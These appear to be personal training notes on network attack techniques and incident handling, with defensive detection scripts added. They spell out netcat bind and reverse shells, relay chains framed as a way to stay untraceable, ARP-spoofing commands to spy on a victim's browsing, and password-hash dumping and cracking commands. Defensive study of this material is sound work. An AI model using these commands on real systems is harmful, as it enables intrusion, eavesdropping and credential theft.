   3. Authentication should not be based on IP address. I.e., if you say allow only this IP to pass through to the DMZ... lol, it is spoofable. Hence use some other authentication mechanism like username/password, VPN etc.
   4. Replace remote commands like rlogin, rsh, telnet and ftp with SSH.
   5. Some legacy systems might not work with ssh etc. In that case, use another machine one hop prior to the legacy machine. Connect to that machine in a secure fashion and then use rlogin, rsh to the legacy system.
   6. Anti-spoof filters at firewalls. Eg: If I see a packet with source IP 20.*.*.* from this interface, drop it.
   7. Enable the Unicast Reverse-Path Forwarding check on routers. It checks its routing table for the source address and incoming interface to determine whether the packet is coming from the path that the sender would use to reach the destination.
   8. No source routing, no IP directed broadcast at border gateways.
Identification
   1. Make sure anti-spoof filters generate a log when they detect spoofing. Usually log analyzers such as enVision collect logs from firewalls etc. and show up these alerts.
   2. IDS sensors that look for IP addresses that do not belong here.
Containment
   1. Identify the machine and remediate.

NetCat - http://h.ackack.net/cheat-sheets/netcat
   It reads and writes data across network connections, using the TCP or UDP protocol.
   1. Netcat client mode -- it initiates connections
   2. Netcat server (listen) mode -- it listens on the TCP/UDP port
   Command options:
      nc -l          Listen mode
      nc             Client mode
      nc -L          Listen persistently. When listening normally using nc -l, it waits for a connection; once established and the client terminates the connection, listen mode is also dropped. Whereas in persistent listen mode, even if the client terminates the connection, it is still listening.
      nc -u          UDP mode; without -u it is TCP
      nc -p <port>   In listen mode, it listens on that local port (e.g. 80). In client mode, it sends data from that (local) source port
      nc -e <prog>   Execute a program after a connection has occurred
      nc -z          Zero I/O: no data transfer, only a TCP connection is established; may send UDP packets
      nc -w <sec>    Wait for connection. Eg: nc -w 3 waits 3 seconds for a connection before it is torn down. Even if a connection is made and there is no data for 3 seconds, it will go off.
      nc -vv         Very verbose
   Uses: transferring files on TCP/UDP ports; port scanning; banner grabbing; a small vulnerability scanner (which vulnerable services are running on the target); backdoor; relay.
   Port scanning: suppose we want to do port scanning; it is a good idea to use ports 80, 443 so as to evade detection. Also it is better to scan ports in a random fashion using the -r switch:
      C:\>nc -v -r 192.168.12.1 1-100
   Now a connection is established... whatever you type at the client will be visible at the server and vice versa.
   Transferring I/O (even files): we need to use < > | to redirect I/O between connections
      C:\Mahesh\Tools\NetCat>nc -vv localhost 17876 < readme.txt
   Now readme.txt is transferred to the other machine listening on port 17876.
   Backdoor: not only input, it can bind an executable to a specified port.
      On the server:
      C:\Mahesh\Tools\NetCat>nc -lvvp 17876 -e calc.exe
      listening on [any] 17876 ...
      DNS fwd/rev mismatch: localhost != RedPC
      On the client:
      C:\Mahesh\Tools\NetCat>nc -vv localhost 17876
      DNS fwd/rev mismatch: RedPC != localhost
      RedPC [127.0.0.1] 17876 (?) open
   Now at the client, Calculator has popped up.
   Backdoor 2 (Reverse Shell): Creating a listening shell with Netcat is a valuable technique, but in order for this technique to be effective the attacker needs to be able to send data to the port on which Netcat is listening. This can pose a problem if there is a router or firewall in the path blocking inbound traffic, as you will not be able to reach the listening port.
   We can also send commands to the server to execute.
   Attacker: the server is listening for a connection
      C:\>nc -lvvp 4444
      listening on [any] 4444 ...
   Victim: the client sends the terminal to the server
      BT ~ # nc -v 192.168.0.198 4444 -e /bin/bash
      192.168.0.198: inverse host lookup failed: Unknown
      (UNKNOWN) [192.168.0.198] 4444 (krb524) open
   Alice: after the connection – ready to take commands.
   It is suggested to use Netcat instead of telnet when you find an open port on any machine, because Netcat is fast and telnet uses telnet control sequences which might blow up some applications running on the end machine.
Replay Attack
   From the pcap file, we can strip off the headers, save only the content to a file and transfer it to the target machine using Netcat. Eg: if we have the transaction command "TRANSFER 1000$ from Acc A to Acc B", replay it.
Relay – when you attack the victim, be untraceable. Hackers use relays which are located in at least 5 locations which are geographically distant and have bad political relationships. Eg: to attack the USA, start with relays at China, India, Pakistan, Israel, Ukraine.
   The attacker first compromises Relay 1 and Relay 2. Configure a relay with Netcat: listen on one port and use a Netcat client to forward to another relay on another port.
  Attacker:  C:\>nc <Relay1> 4321
  Relay1:    C:\>nc -L -p 4321 | nc <Relay2> 4321
  Relay2:    C:\>nc -L -p 4321 | nc <Target> 4321
NOW we have established a one-way channel from the attacker to the target.
  Target:    C:\>nc -L -p 4321
<<Not clear, look into it>> 1:17
Defending Against Netcat
  o Prevent Netcat file transfers: a firewall configuration issue
  o Secure against port scanning: minimal number of listening ports; block arbitrary connections to ports; close unused ports [every open port should have a justification]
  o Protect against vulnerability scanning: apply patches
  o Backdoors: you need to know what processes are running so you can detect rogue processes
  o Prevent relay attacks: no single point that an attacker can relay around
  o Stop persistent listeners: periodically check for unexpected listening ports
Exercise: create a backdoor, create a relay.
Scenario: you are sitting outside a firewall that blocks inbound access but allows outbound packets. How do you get outside access to a listener inside?
SNIFFING
Wireshark: it can parse many protocols.
Sniffit: it can be used in interactive mode (sniffit -i), i.e. it can handle interactive sniffing of sessions in real time. The attacker can directly see what the victim is doing in real time by sniffing the session.
These tools only do passive sniffing (parsing packets arriving at the NIC) and hence work in a hub environment.
Active sniffing: injects packets into the network so as to sniff in a switched environment.
DSniff: a collection of tools for network auditing and penetration testing.
Foiling switches using ARP spoofing [arpspoof]
Over Ethernet, data is transferred in frames containing source and destination MAC addresses. The destination MAC address is found by sending an ARP request. A machine that receives an ARP reply (irrespective of whether it sent an ARP request or not) updates its ARP cache (the mapping of IP to MAC address).
1.
So if the victim host receives an ARP reply containing a valid destination IP (a router/server etc.) and the attacker's MAC address... voila, the victim's machine has been poisoned.
2. Configure your machine for IP forwarding (if the packet is not destined for your MAC, forward it to the default gateway). IP forwarding on Linux:
  echo 1 > /proc/sys/net/ipv4/ip_forward
[The TTL is decremented; as an investigator, if we can see that the TTL has been decremented one more time than the initial TTL would lead us to expect, we need to look into it.]
In practice ARP can also be used for good, such as failover cases: ARP the router over to the failover machine.
Foiling switches by flooding the switch [macof]
1. Send Ethernet frames with spoofed MAC addresses to the switch so that the MAC address table on the switch is filled and no more entries can be loaded.
2. Now some switches go either into a denial-of-service state delivering no packets, or into hub state delivering packets across all interfaces of the switch.
Additional tools with DSniff
  o tcpkill: kills active TCP connections. When there is a telnet connection, you can break it by sending an RST packet to both ends. Now sniff while the user re-authenticates to gather credentials.
  o tcpnice: injects ICMP source quench messages to slow down the traffic
  o filesnarf: captures the transferred files
  o mailsnarf: grabs e-mails sent using SMTP and POP
  o msgsnarf: grabs messages sent using AOL Instant Messenger, ICQ, Internet Relay Chat and Yahoo! Messenger
  o urlsnarf: grabs the URLs visited
  o webspy: using the URLs captured from the network, displays the pages viewed by the victim in the attacker's browser. Essentially, webspy lets the attacker look over the victim's shoulder as the victim surfs the Web. Webspy is quite useful for demos to management. HTTPS doesn't work; things that authenticate using cookies etc. may or may not work.
Exercise: WebSpying on a victim
1. Enable IP forwarding [or use fragrouter with no fragmentation]
  # echo 1 > /proc/sys/net/ipv4/ip_forward
2.
ARP poison the victim and the gateway
  # arpspoof -i eth0 -t 192.168.1.5 192.168.1.1   [poison the target with the gateway IP]
  # arpspoof -i eth0 -t 192.168.1.1 192.168.1.5   [poison the gateway with the target IP]
Now you are the MITM.
3. Use webspy to grab the browser traffic [IE and Netscape]
  # webspy -i eth0 192.168.1.5   [spy on the target IP's traffic]
4. Start a browser from the command line
  # firefox &
5. Now you can see what the victim is browsing.
Just a tip: if possible, have the proxy log User-Agent types in web traffic. That way we can identify malware-infected machines and their traffic.
DNSSpoof and WebMITM (Web Monkey in the Middle)
WebMITM acts as a proxy. After DNS spoofing, the victim comes to you for the service he is trying to reach. Eg: he wants to go to the banking site www.abcbank.com; dnsspoof running on the attacker machine sends a spoofed DNS response to the victim claiming to be abcbank.com. Now the user comes to you, and you either phish the site or proxy it.
The problem with the above is certificate errors. The victim is presented with the attacker's certificate, not the abcbank.com certificate, which warns the user that somebody is pretending to be their bank.
[Figure: Firefox Certificate Warning]
The top warning box can be avoided by having a certificate signed by a CA. The second warning box is caused by the browser noticing that the DNS name in the certificate does not match the name of the Web site the user is trying to access. A careful attacker can make sure the name on the certificate matches the domain name of the Web server, but a legitimate, trustworthy Certificate Authority should never sign such a bogus certificate for someone impersonating a bank. Unfortunately, most users just click yes..yes..yes to establish the SSL connection with the untrusted site.
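A defender-side check for the arpspoof poisoning described above, added here as an example; it is not part of the original notes or of dsniff. It takes the ARP replies seen on the segment as (sender IP, sender MAC) pairs, for instance from `tcpdump -n arp` or periodic `arp -a` snapshots, and an optional static table of trusted mappings; all addresses below are constructed.

```python
"""Detect ARP cache poisoning from a stream of observed ARP replies.

Added example (not part of the original notes or of dsniff). It reports the
three signs of an arpspoof run: an IP whose MAC changes, a reply contradicting
a hard-coded static ARP table, and one MAC answering for several IPs.
"""
from collections import defaultdict

# Constructed trusted table: what a static ARP table would hard-code for the
# gateway and the victim workstation used in the exercise above.
STATIC_ARP = {
    "192.168.1.1": "00:11:22:aa:bb:01",   # gateway
    "192.168.1.5": "00:11:22:aa:bb:05",   # victim workstation
}

# Constructed replies. The last two are what the two arpspoof commands look like
# on the wire: one MAC (the attacker's) starts claiming both gateway and victim.
SAMPLE_REPLIES = [
    ("192.168.1.1", "00:11:22:aa:bb:01"),
    ("192.168.1.5", "00:11:22:aa:bb:05"),
    ("192.168.1.7", "00:11:22:aa:bb:07"),
    ("192.168.1.1", "00:11:22:aa:bb:01"),   # a normal repeat, not an alert
    ("192.168.1.1", "de:ad:be:ef:00:99"),   # gateway now resolves to the attacker
    ("192.168.1.5", "de:ad:be:ef:00:99"),   # victim now resolves to the attacker
]


def detect_arp_poisoning(replies, static_table=None):
    """Return a list of alert strings; an empty list means nothing suspicious."""
    alerts = []
    ip_to_mac = {}                 # what each IP currently resolves to
    mac_to_ips = defaultdict(set)  # which IPs each MAC has answered for
    static_table = {ip: mac.lower() for ip, mac in (static_table or {}).items()}

    for ip, mac in replies:
        mac = mac.lower()
        # 1. An IP whose MAC changes mid-stream: the poisoned cache entry.
        #    (Legitimate failover, which the notes mention, trips this too, so
        #    a real monitor keeps a small allowlist of planned changes.)
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"MAC change for {ip}: {previous} -> {mac}")
        # 2. A reply contradicting the hard-coded static table.
        if ip in static_table and static_table[ip] != mac:
            alerts.append(f"static table violation for {ip}: expected {static_table[ip]}, saw {mac}")
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        # 3. One MAC answering for several IPs: gateway plus victim is a full MITM.
        if len(mac_to_ips[mac]) > 1:
            alerts.append(f"MAC {mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES, STATIC_ARP):
        print("ALERT:", alert)
```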
The same works for ssh.
Defences
  o System administrators, network managers and security personnel should understand and use secure protocols to conduct their job activities.
  o For networks containing very sensitive systems and data, enable port-level security on your switches, i.e. bind the MAC address to a port using port security.
  o For extremely sensitive networks like Internet DMZs, use static ARP tables on the end machines, hard-coding the MAC-to-IP mapping for all systems on the LAN. This takes extra overhead when changing NIC components.
Identification
  o On a suspect Unix machine, if ifconfig shows the word PROMISC, it is listening.
  o On Windows, use PromiscDetect, another free tool at http://ntsecurity.nu/toolbox/promiscdetect
  o To detect from remote, use Sentinel, which identifies sniffers using EtherARP, EtherPing and DNS tests:
    o EtherARP: send an ARP request to the suspect IP with a bogus MAC; if a response is received, it is listening
    o EtherPing: same as ARP, but uses an ICMP ping. If it doesn't sniff, it should not see the ping.
    o DNS test: send a DNS request and check whether any other machine does a reverse DNS lookup of that website
Containment
  If detected on one machine, it can be present on another machine.
Eradication
  Check for rootkits and identify the process that is listening in promiscuous mode.
Recovery
  Monitor the attacker's activity, as he is likely to use the information gathered by sniffing.
Day 3 Session 2
Session Hijacking
Tools:
  o Hunt
  o Dsniff --- sshmitm
  o Ettercap
  o Juggernaut
  o IP Watcher, TTYWatcher, TTYSnoop
Network-based session hijacking
  o Combines spoofing and sniffing
  o Alice and Bob have an existing connection
  o Trudy is sniffing packets (on the LAN)
  o Trudy starts injecting packets
  o Bob thinks the packets came from Alice
This works even if strong authentication is used, provided there is no encryption.
ACK Storm
An ACK storm can be avoided using Ettercap, with Eve becoming man in the middle by ARP poisoning. Now Eve sniffs the packets destined for DD.DD… and replays them to Bob.
Whenever packets actually travel between Alice and Bob, Ettercap will "fix" the sequence numbers on those packets before forwarding them on. Alice and Bob don't notice any discontinuity in the sequence number stream, so no ACK storm results. If Eve is far from Alice and Bob, Eve has to ARP poison the routers/switches between Eve and Alice and between Eve and Bob.
Defense
  Encrypted sessions prevent session hijacking because the attacker will not have the keys to encrypt or decrypt information. Therefore an attacker cannot inject meaningful traffic into a session. Use all the defenses that apply to sniffing and spoofing.
Identification
  o Users might report that they lose sessions
  o Error messages from ssh that the server keys have changed
Eradication
  Check for rootkits and change the passwords.
DNS Cache Poisoning >> Search <<
Buffer Overflows [SANS_3B – 50:00]
Stack-Based Buffer Overflow
This can be exploited when input sanitization and input checking are not performed by the application. When a function call is made, execution stops and the return address is stored on the stack so as to resume after the called function completes [Return PTR]. The current state of the registers is stored as the saved frame pointer. Inside the function, memory for the variables is allocated in the stack buffer. Suppose the input is more than the variable can hold: the input data overflows and overwrites the return pointer. Now when the function completes and the original program resumes, it loads the value in the return pointer, which has been overwritten by the malicious input. Usually the return pointer ends up loaded with the address of the stack location holding the malicious shellcode.
Culprit: input bounds checking.
1. Identify the buffer size; more exactly, identify the location of EIP. Input a very long pattern; when the application crashes, look into the technical information. If the segmentation fault was caused by trying to access a location that is part of the input sequence we supplied, we can likewise identify the location of EIP.
[Brute-force fuzzing]
2. The exploit is tailored to the operating system and architecture.
3. If the exploit is so large that it does not fit, split the exploit. Eg: part of the exploit goes in one field and the remainder in another field. After overflowing one field, the shellcode JMPs to the code in the other field.
4. Another method is staged loading: a small exploit runs, and when it reaches the end of its code it fetches the next exploit data, loads it into the same space and runs again.
5. If you are not sure of the exact location of the exploit code, use NOP NOP NOP NOP <EXPLOIT>. Now even if the return pointer lands on a NOP, execution slides through and finally runs the exploit.
Sploit / Metasploit
Exploit: the thing that triggers the condition so that we can execute code.
Payload: the actual code that executes; it can be the machine code of a shell, a command to add another user, etc.
It has an arsenal of exploits. Metasploit offers a huge set of payloads, that is, the code the attacker wants to run on the target machine, triggered by the exploit itself. An attacker using Metasploit can choose from any of the following payloads to foist on a target:
  o Bind shell to current port. This payload opens a command shell listener on the target machine using the existing TCP connection of a service on the machine. The attacker can then feed commands to the victim system across the network to execute at a command prompt.
  o Bind shell to arbitrary port. This payload opens a command shell listener on any TCP port of the attacker's choosing on the target system.
  o Reverse shell. This payload shovels a shell back to the attacker on a TCP port. With this capability, the attacker can force the victim machine to initiate an outbound connection, sent to the attacker, polling the bad guy for commands to be executed on the victim machine.
So, if a network- or host-based firewall blocks inbound connections to the victim machine, the attacker can still force an outbound connection from the victim to the attacker, getting commands from the attacker for the shell to execute. As we discuss in Chapter 8, Phase 3: Gaining Access Using Network Attacks, the attacker will likely have a Netcat listener waiting to receive the shoveled shell.
  o Windows VNC Server DLL Inject. This payload allows the attacker to control the GUI of the victim machine remotely, using the Virtual Network Computing (VNC) tool sent as a payload. VNC runs inside the victim process, so it doesn't need to be installed on the victim machine in advance. Instead, it is inserted as a DLL inside the vulnerable program to give the attacker remote control of the machine's screen and keyboard.
  o Reverse VNC DLL Inject. This payload inserts VNC as a DLL inside the running process, and then tells the VNC server to make a connection back to the attacker's machine, in effect shoveling the GUI to the attacker. That way, the victim machine initiates an outbound connection to the attacker, but allows the attacker to control the victim machine.
  o Inject DLL into running application. This payload injects an arbitrary DLL of the attacker's choosing into the vulnerable process, and creates a thread to run inside that DLL. Thus, the attacker can make any blob of code packaged as a DLL run on the victim.
  o Create Local Admin User. This payload creates a new user in the administrators group with a name and password specified by the attacker.
  o The Meterpreter. This general-purpose payload carries a very special DLL to the target box. This DLL implements a simple shell, called the Metasploit Interpreter.
    o It does not create a new process, it just runs inside the vulnerable app: no detection.
    o It doesn't touch the hard drive: no evidence.
    o Although the vulnerable application has limited access rights, Meterpreter's commands have full privileges: great control for the attacker.
PRIV is an extension that is injected and carries a bunch of privilege escalation attacks, so that even when a user with limited privileges is exploited, the attacker can run commands with admin privileges.
Meterpreter 3
Polymorphic code, used to avoid signature detection by AV:
  o XOR the exploit code with a key
  o Randomized NOP generator: use functional equivalents of code that does nothing, e.g. multiplying AH by 1, adding 0 to CX etc., at various places in the exploit code to evade detection
Exercise:
1. Most machines have a TFTP client on them. So exploit the target machine and get a little shell on it.
2. In the shell, get Netcat using TFTP.
3. Use Firewalk to identify which packets are allowed and use the corresponding mechanism to transfer files. [Some firewalls block the outgoing TFTP port; then use FTP, and failing that use SSH.]
4. Use a bind shell or reverse shell to take control.
Defending
  o Apply patches
  o Use HIPS
    o They observe syscalls
    o Look into memory: look for strange jumps
  o Non-executable stacks
    o On Windows, use DEP (Data Execution Prevention)
    o On Solaris, by default
    o On Linux, there are patches by "Solar Designer"
    Attacker: OK, no problem, I will use functions which are in libc or ntdll.dll to carry out the malicious activity. I am just using those functional components which are necessary and allowed for the application. – Return to glibc, Return to NTDLL
  o Use StackShield: Stack Shield is a tool for adding protection to programs from this kind of attack at compile time without changing a line of code. Stack Shield uses a more secure protection system than other tools like Immunix StackGuard. Stack Shield is designed to support GCC on a Linux Intel 386 class platform.
  o Avoid programming errors
  o Use static code analysis tools
Parser Vulnerabilities
An IDS/IPS parses data packets to analyze them and pass them through. There are maliciously crafted packets which, when parsed by the IDS/IPS, cause a buffer overflow and thus blind the IDS, i.e. to management it shows no suspicious packets (but it is actually not detecting them). File parsers also suffer buffer overflows when a maliciously crafted file is opened. Eg: when you open a JPEG file, it executes malicious code.
Format String Attacks
  C:\Mahesh\Tools\NetCat>sort %x%x%x
  7c812fd900The system cannot find the file specified.
7c812fd900 is a value from the stack.
  o %x reads and prints 4 bytes from the stack; this may leak sensitive data
  o %n writes the number of characters printed so far onto the stack; this allows stack overflow attacks...
C format strings break the "don't mix data & code" principle.
Easy to spot and fix:
  o replace printf(str) by printf("%s", str)
>>>Check out formatflaw.c<<<
>>>Some exercises in the last 20 mins<<<
Day 4
User input sanitization is the major culprit behind attacks such as buffer overflows, format string attacks, SQL injection etc. If the application is prone to such attacks, an attacker can inject a command shell to carry out further attacks.
Eg: exploiting the Unicode vulnerability in Windows IIS.
Password Cracking
Password cracking resources: http://www.skullsecurity.org/wiki/index.php/Passwords
Default passwords: http://www.phenoelit-us.org/dpl/dpl.html
Password guessing: Hydra, http://freeworld.thc.org/thc-hydra/
It supports many protocols: Telnet, FTP, HTTP, HTTPS, HTTP-PROXY, LDAP, SMB, SMBNT, MS-SQL, MYSQL, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP, PCNFS, ICQ, SAP/R3, Cisco auth, Cisco enable and Cisco AAA.
  # hydra -l <user> -P <passworddictionary> -v <target> <protocol>
In the above it is brute-forcing 192.168.0.112 for user ftp with the list of passwords stored in passwords.txt.
  o It is time-consuming and resource intensive
  o It generates IDS alerts
  o Machines are usually configured for account lockout after multiple login failures
  o It can also be used as a DoS attack
Password cracking: passwords are stored in either encrypted form or as a hash (message digest) on the machine, and are used to authenticate the user before logging in.
Hybrid password cracking: the password-cracking tool starts guessing passwords using a dictionary term. Then it creates other guesses by appending or prepending characters to the dictionary term, methodically adding characters to words in a brute-force fashion.
Password cracking for a botnet owner would be fairly easy and simple.
Tools:
  o Cain, a fantastic free tool available from Massimiliano Montoro at www.oxid.it/cain.html
  o John the Ripper, a powerful free password cracker for UNIX/Linux and some Windows passwords, written by Solar Designer, available at www.openwall.com/john
  o Pandora, a tool for testing Novell Netware, including password cracking, written by Simple Nomad, and available at www.nmrc.org/project/pandora
  o LC5, the latest incarnation of the venerable L0phtCrack password cracker, an easy-to-use but rather expensive commercial password cracker at www.atstake.com/products/lc/purchase.html
CAIN: it's not just a password cracker, it is a multitude of tools:
  o WLAN discovery like NetStumbler
  o Identify whether the target is sniffing packets
  o Network discovery
  o Captures interesting packets on the network containing user IDs etc.
  o A tool to dump and reveal all encrypted or hashed passwords cached on the local machine, including the standard Windows LM and NT password representations, as well as the application-specific passwords for Microsoft Outlook, Outlook Express, Outlook Express Identities, Outlook 2002, Microsoft Internet Explorer and MSN Explorer
  o An ARP cache poisoning tool, which can be used to redirect traffic on a LAN so that an attacker can more easily sniff in a switched environment
  o A remote command shell, rather like the backdoor command shells
  o A remote route table manager, so an administrator can tweak the packet routing rules on a Windows machine
  o A remote TCP/UDP port viewer that lists local ports listening on the system running Abel, rather like the Active Ports and TCPView tools
  o A remote Windows password hash dumper, which an attacker can use to retrieve the encrypted and hashed Windows password representations from the Security Accounts Manager (SAM)
Password Cracking on Windows
1. Retrieve the LM hash and NTLM hash from the SAM database
2. Use Cain to crack it
Retrieving hashes
  C:\Windows\repair\sam._   [the original SAM file cannot be opened/copied]
Cain can retrieve LM/NTLM hashes from challenge packets on the network: whenever anyone authenticates to the domain or tries to access a share, the attacker can run Cain in sniffing mode to snag user authentication information from the network. So the attacker can entice the victim into making such an authentication, eg: sending a mail asking them to open a shared drive which needs authentication etc.
It also supports rainbow tables.
Rainbow tables: a rainbow table is a lookup table of precomputed hashes that can be matched against the hash that needs to be cracked. It helps to recover plaintext passwords. Salts make it difficult to crack using rainbow tables. Usually they are 64 bit on most systems.
Unfortunately no salt is used for Windows NTLM hashes.
Samdump2
To retrieve these hashes from a Windows machine, boot from Linux, mount the C: drive and dump the SAM database:
  [root@~]# samdump2 /mnt/CPrimary/Windows/system32/config/SYSTEM /mnt/CPrimary/Windows/system32/config/SAM > samdb.txt
NOTE: SYSTEM should be dumped prior to dumping SAM, since if syskey is enabled the SAM db is encrypted and the key is stored in the SYSTEM hive.
John the Ripper
A superb professional password cracking tool.
On Linux, retrieving hashes: /etc/passwd. On some Linuxes, the hashes are stored in /etc/shadow (or /etc/secure).
  # ./unshadow <passwd file> <shadow file> > output.txt
To grab a copy of a shadow password file, an attacker must find a root-level exploit, such as a buffer overflow of a program that runs as root or a related technique, to gain root access. After achieving root-level access, the attacker makes a copy of the shadow password file to crack.
Defenses:
  o Strong password policy
    o Use alphanumerics, mixed case, numbers
    o Password expiry after 30, 60 or 90 days
    o Use password filtering software on the AD server during account creation and password modification: Password Guardian, a commercial tool, www.georgiasoftworks.com; Strongpass, a free tool, http://ntsecurity.nu/toolbox
  o User awareness
  o Where possible, use authentication tools other than passwords
    o Use RSA tokens, biometric access
  o Protect hashes
    o On Linux, activate password shadowing, i.e. use /etc/shadow, which can be accessed only by root
    o On Windows, disable LM authentication: define HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
    o Delete %systemroot%\repair\sam._
Exercise
1) Create various accounts
2) Combine the passwd copy and shadow copy and retrieve the hashes
3) Look at John the Ripper's password.lst
4) Delete the accounts
5) Shred the files, which overwrites them with 0s and 1s so that they are removed from the hard disk blocks.
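An audit of the Linux side of the password defences above (shadowed hashes, hash strength, 30/60/90-day expiry), added as an example; it is not part of the original notes or of John the Ripper. It reads shadow-format lines; the sample below is constructed, its hash bodies are placeholders, and "today" is a fixed day number so the output is reproducible.

```python
"""Audit /etc/shadow entries against the password defences above.

Added example; not part of the original notes or of John the Ripper. It
reports, per account, what a cracker would exploit: no password, a weak or
obsolete hash algorithm, no or too long an expiry, and passwords already
older than the policy maximum.
"""

# Constructed sample. Fields: name:hash:lastchange:min:max:warn:inactive:expire:
# `lastchange` is in days since 1970-01-01; hash bodies are placeholders only.
SAMPLE_SHADOW = """\
root:$6$saltsalt$PLACEHOLDERHASH:19700:0:90:7:::
alice:$6$othersalt$PLACEHOLDERHASH:19650:0:90:7:::
bob:$1$abcdefgh$PLACEHOLDERHASH:19700:0:99999:7:::
legacy:AbCdEfGhIjKlM:19000:0:90:7:::
svc:!:19700:0:90:7:::
guest::19700:0:90:7:::
"""

TODAY = 19750            # constructed "today" as a day number, for reproducible output
MAX_AGE_DAYS = 90        # the notes' longest expiry choice (30, 60 or 90 days)

# crypt(5) prefixes; anything unlisted, or the 13-character DES form, counts as weak.
HASH_PREFIXES = (
    ("$6$", "sha512crypt"), ("$5$", "sha256crypt"), ("$y$", "yescrypt"),
    ("$2b$", "bcrypt"), ("$2y$", "bcrypt"), ("$1$", "md5crypt"),
)
WEAK_ALGORITHMS = {"md5crypt", "descrypt", "unrecognised"}


def hash_algorithm(field):
    """Classify the hash field of a shadow entry."""
    if field == "":
        return "empty"
    if field[0] in "!*":
        return "locked"
    for prefix, name in HASH_PREFIXES:
        if field.startswith(prefix):
            return name
    if len(field) == 13 and "$" not in field:
        return "descrypt"          # traditional DES crypt: 12-bit salt, 8-char limit
    return "unrecognised"


def audit_shadow(text, today=TODAY, max_age_days=MAX_AGE_DAYS):
    """Return {account: [issue, ...]}; an empty list means the account passed."""
    report = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 5:
            continue                          # malformed; a real tool would warn
        name, pw, lastchange, _min_age, max_age = fields[:5]
        issues = []
        algorithm = hash_algorithm(pw)
        if algorithm == "locked":
            report[name] = issues             # nothing to crack; skip age checks
            continue
        if algorithm == "empty":
            issues.append("no password set: login without credentials")
        elif algorithm in WEAK_ALGORITHMS:
            issues.append(f"weak hash {algorithm}: rehash as sha512crypt or yescrypt")
        # Expiry policy: an empty or huge max field means the password never expires.
        if not max_age.isdigit() or int(max_age) > max_age_days:
            issues.append(f"max age {max_age or 'unset'} exceeds policy of {max_age_days} days")
        if lastchange.isdigit() and today - int(lastchange) > max_age_days:
            issues.append(f"password is {today - int(lastchange)} days old")
        report[name] = issues
    return report


if __name__ == "__main__":
    for account, issues in audit_shadow(SAMPLE_SHADOW).items():
        print(account, "OK" if not issues else "; ".join(issues))
```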
----------------- break ----------------------
Shell Access on Windows
Scenario: the attacker has an account created on the victim and uses a remote connection to open C$ of the victim's machine. Now the attacker copies Netcat onto the victim's machine and runs
  Z:\>nc -l -p 1545 -e cmd.exe   [Z: on the attacker machine is C:\ on the victim's machine]
Result: the attacker created a Netcat listener on himself :P LOL…..
1. Connect to the remote machine with an administrative session.
2. Copy Netcat and a batch file that runs Netcat as a listener onto the target machine.
3. Configure the Task Scheduler to run the batch file:
  at \\computername time [/interactive] [/every:date,... | /next:date,...] command
  at \\computername id /delete | /delete /yes
This will run netcat.bat every day at 4:02 PM on the victim machine with SYSTEM privileges. Now Netcat is listening on the victim machine.
Alternately,
3. psexec from Sysinternals is used to run executables on remote machines:
  Z:\>psexec \\victimmachine -c netcat.bat   [copy the files]
  Z:\>psexec \\victimmachine netcat.bat      [run the batch file]
Run Regedit interactively in the System account to view the contents of the SAM and SECURITY keys:
  psexec -i -d -s c:\windows\regedit.exe
PSEXEC did not work out due to BlackIce, which blocked it on the victim machine.
Defences
  o Do not let the attacker get admin access to the machine
  o Harden the ports
  o net session shows what sessions are present on the machine
  o net start shows what services are running
  o Disable scheduling if not required
Containment
  o Check the scheduled tasks and delete them
  o Kill the services/processes that are listening
Eradication
  o Identify the process and remove it
  o Check for rootkits; if present, rebuild the machine
Recovery
  o Harden the machine based on preparation
WORM
A self-replicating code that spreads across the network. Each instance is called a segment. Worms use vulnerabilities in applications and operating systems to spread. Eg: the Blaster worm uses a buffer overflow vulnerability in MS-RPC DCOM.
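For the shell-access defences and containment steps above (unexpected listeners, scheduled jobs, processes to kill), an added example that is not part of the original notes or of Sysinternals: it correlates `netstat -ano` with `tasklist` so every listening port is tied to an image name, checks `at` jobs, and flags anything outside a baseline taken from the system build checklist. All three tool outputs below are constructed samples in the real tools' text layout.

```python
"""Audit a Windows host for unexpected listeners and scheduled jobs.

Added example (not from the original notes or from Sysinternals). It parses
constructed `netstat -ano`, `tasklist` and `at` output and reports listeners
and jobs that are not in the baseline, plus anything run by a known shell tool.
"""
import re

# Constructed `netstat -ano` output; port 1545 mirrors the nc -l -p 1545 listener above.
NETSTAT_ANO = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       876
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:1545           0.0.0.0:0              LISTENING       2316
  TCP    192.168.0.198:3389     192.168.0.50:51022     ESTABLISHED     1204
  UDP    0.0.0.0:500            *:*                                    1100
"""

# Constructed `tasklist` output for the same PIDs.
TASKLIST = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0         24 K
svchost.exe                    876 Services                   0      5,120 K
nc.exe                        2316 Services                   0      1,040 K
svchost.exe                   1204 Services                   0      7,300 K
lsass.exe                     1100 Services                   0      3,900 K
"""

# Constructed `at` output: the daily 4:02 PM netcat.bat job the notes describe, plus a legitimate job.
AT_JOBS = """\
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each M T W Th F         4:02 PM       netcat.bat
        2   Each Su                 2:00 AM       backup.cmd
"""

# Baseline (constructed): (port, image) pairs and job commands the build checklist expects.
BASELINE_LISTENERS = {(135, "svchost.exe"), (445, "System"), (500, "lsass.exe")}
BASELINE_JOBS = {"backup.cmd"}
REMOTE_SHELL_TOOLS = {"nc.exe", "netcat.exe"}


def parse_tasklist(text):
    """Map PID -> image name from `tasklist` output."""
    pid_to_image = {}
    for line in text.splitlines():
        m = re.match(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$", line)
        if m:
            pid_to_image[int(m.group("pid"))] = m.group("image")
    return pid_to_image


def parse_listeners(text):
    """Yield (proto, port, pid) for every listening socket in `netstat -ano` output."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 5 and parts[0] == "TCP" and parts[3] == "LISTENING":
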